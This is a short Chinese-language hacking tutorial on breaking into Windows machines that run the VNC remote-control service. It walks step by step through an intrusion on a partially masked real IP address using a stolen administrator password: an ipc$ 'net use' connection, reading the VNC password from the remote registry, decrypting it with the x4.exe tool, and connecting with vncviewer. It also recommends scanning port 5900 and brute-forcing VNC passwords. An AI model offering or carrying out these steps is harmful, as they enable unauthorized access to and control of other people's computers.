首先把5900端口加进你常用的扫描器.

nt服务器的远程管理(所谓hack,就是去远程管理嘛),基于GUI的通常是win的终端连接(3389),pcanywhere(5631),还有就是vnc(5900),让我们来熟悉一下它.

VNC——Virtual Network Computing（即虚拟网络计算机系统）是由AT&T开发的各种操作系统之间的相互操作管理系统，使用VNC可以使你在不同的计算机之间实现真正的相互操作，不过，VNC只限于GUI之间的相互操作，如Windows同Linux系统的X Window之间相互操作，Windows同Macintosh之间的相互操作等,它可以安装在Windows中而让使用者在远端遥控自己的电脑，就算是遥控不同的操作平台也没有问题.

如果你使用的Linux系统,甚至可以用浏览器控制开了VNC服务的机器,如果你是用的win系统,你需要一个VNC的客户端连接器vncviewer.exe.

然而VNC的认证特别简单,它只通过简单的口令认证即允许用户全权操作远端的计算机,更可怕的是,VNC的密码就存储在注册表里,读出Registry的值后经过简单的解密,就能让VNC的密码显原形.一个叫Phenoelit的外国人写了一个解密程序x4.exe,他的网http://www.phenoelit.de/还有些好东西,大家可以去看看.

现在来举个例子:我拿到了209.61.*.*的管理员administator的密码是7nt,它开了VNC服务(5900端口),现在开始: 
1)net use \209.61.*.*ipc$ "7nt" /user:"administrator" 
先和它做ipc$连接.(如果它没有开ipc$,你可以上传一个reg.exe去读它的Registry的值) 
2)打开你的注册表,连接网络注册表(209.61.*.*),通常VNC的密码是在:HKEY_CURRENT_USERSoftwareORLWinVNC3Password 读出他的值是:f1 ad 32 63 f5 ed 3e d7 
3)在cmd下运行x4.exe,输入x4.exe -W回车,注意W要大写,然后输一个值回一次车,直到输完8个值,看看密码出来了:7ntok 
4)用vncviewer.exe连过去看看吧,哈.

如果你还没有拿到对方管理员密码,也还有些软件可以挂字典暴破VNC的密码,速度还行,象scanarator,不过一般VNC的密码都较复杂,至少又多了一种攻破系统的方法和希望吧.